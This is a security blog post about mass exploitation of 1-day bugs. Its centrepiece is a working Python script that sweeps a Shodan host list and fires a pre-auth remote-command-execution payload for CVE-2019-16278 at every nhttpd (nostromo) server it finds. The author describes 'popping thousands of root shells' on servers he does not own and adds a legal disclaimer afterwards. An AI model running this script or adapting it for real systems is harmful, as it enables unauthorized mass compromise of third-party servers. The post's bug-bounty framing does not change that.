Hello Luvs,

This post is just another brain dump, like the last post. Today we are going to talk about mass exploitation. Criminals usually use mass exploitation to control as much as hosts as they can. As you may know, I've worked on a tool called Hunter Suite, which aimed to be a revolution for bug hunting. But my life is so unpredictable these days; I'm not sure when or if I really can finish it (too much work for one boy). That's why I started sharing my thoughts in the hope of someone out there will find it useful.

Table of Contents

Introduction

Botnets are generally very successful exploiting vulnerable IoT and Web because of the number of exploitable hosts out there. You can check out the list of exploits used by Miari and more recently Mozi . The fun fact is most bot authors are not familiar with exploit development concepts (even though IoT exploits are a breeze to write compared to harder stuff like browsers), So they usually use public and, in most cases, outdated exploits.

One component of the hunter suite is to exploit hot vulnerabilities. You are using either of these two methods.

slightly modify and use an excellent 1-day exploit fixing reliability issues and crashes changing payloads

conduct a patch analysis to mine a 1-day Reverse the patch and extract the bug Write an exploit



Whats a good 1-day exploit?

Well, it depends, but usually, you don't want to waste your time on writing an exploit for a target with <5 users.

So, for example, in the case of web exploitation, here are some worthy targets.

Content management systems (also their plugins): WordPress

Joomla

Drupal

... Backend Web Frameworks: Rails

Django

Laravel

... Front End Frameworks: Vue

Angular

React

Bootstrap

... Web Servers: Nginx

Apache

Lite HTTP

.... Internet of things: Big market Routers

IP cameras

SCADA

.... You get the idea.

Practicality

As you aren't malicious, you won't need an implant or backdoor. Botnets usually have to create various versions of their implants (MISP, ARM, X86, x84, etc.) to maximize their infection rate.

Next is to scan the whole target IP space (e.g., bug bounty pipeline) for vulnerable assets. There are few tools on the market for attack surface discovery like assetnote.io and immuniweb . You can also leverage APIs like shodan.io zoomeye.org and censys.io to make your life easier. here is an illustration for visual people.

CVE-2019-16278 nhttpd (nostromo) < 1.9.7 pre-auth RCE

As you see in all my previous posts, I like to have a practical case study. for the sake of this post, I chose a very recent vulnerability in nhttpd.

here is the original exploit

and here is a detailed vulnerability analysis So I jump into a live example. If we search for Nostromo in, for instance, shodan.io, we will see thousands of running instances.

Now, all we have to do is to detect and exploit the vulnerable instances. And I already talked about it before, these days it can be speedy. So all we have to is parse our host lists (in this case shodan export) and try to exploit vulnerable instances.

Here is how your script can look.



""" @author: 0xSha @contact: [email protected] @organization: www.0xsha.io """ import csv import requests # in case of debugging and hosting detection # import json # import time def read_hosts_from_csv(): """ reads the shodan cvs dump and extract host and ports @:parameter none :return: host lists """ path = '/shodan-export.csv' host_lists = [] with open(path, newline='') as csvfile: records = csv.reader(csvfile) for record in records: host_lists.append(record[0] + ":" + record[1]) return host_lists if __name__ == '__main__': # proxy = {"http": "http://127.0.0.1:8080"} exp = "/.%0d./.%0d./.%0d./.%0d./bin/sh" for host in read_hosts_from_csv(): host, port = host.split(':') # Lazy Me if "IP" not in host: # Debugging request # req = requests.post('http://' + host + ":" + port+exp, # data='ifconfig 2>&1; echo "~~~~~~~~~"; id; echo "##########";', timeout=3, # proxies=proxy) try: cmd = "whoami;id;uname -a" print("[~] Trying ... " + host, port) req2 = requests.post('http://' + host + ":" + port + exp, data='ifconfig 2>&1; echo "~~~~~~~~~~"; ' + cmd + ' ; echo "##########";', timeout=10) # change the timeout if needed # print (req2.status_code) # print (req2.text) firstIndex = str(req2.text).find('~~~~~~~~~~') secondIndex = str(req2.text).find('##########') if firstIndex: print("#################### Vulnerable #######################") print("[+] Now exploiting "+host) print(str(req2.text)[firstIndex + 10:secondIndex]) # Host Detection # time.sleep(10) # req3 = requests.get( # 'https://www.who-hosts-this.com/APIEndpoint/Detect?key' # '=YOUR_API_KEY&url=' + host) # isp = json.loads(req3.text) # print("Hosted by:" + isp['results'][0]['isp_name']) print("#################### End #######################") except: # print('Err' + host) pass

You can also download the script from here. Now, all we have to do is run our script and pour ourselves a coffe.

Popping thousands of root shells

Here is the video for demo lovers.

Conclusion

The amount of vulnerable hosts out there is unbelievable., more internet-wide bug bounty programs needed to slay these bugs otherwise botnets will have easy wins just using 1-day exploits.

Careful luvs, what I demonstrate here can get you in legal trouble, in my case, I didn't alter, download, touch any data on any few servers I tested, and the only commands I ran are harmless id to proof of the vulnerability. Do now pwn what you don't own.

So here is a summary

know your assets

set the alarm for worthy patches and exploits

continuously scan your pipeline for new instances

detect and exploit

report and claim your bounty

Infosec has always been a part of my life. I made a living out of it, but I somehow feel people care less every day (maybe because they can't do anything about it?!), So in the end, I'm probably better off creating drama TV shows ;) rather than talking about fuzzing, exploitation, reverse engineering and how I spend thousands of bucks and most of my life on infosec and SciTech. Yet again, here I am.

till then luvs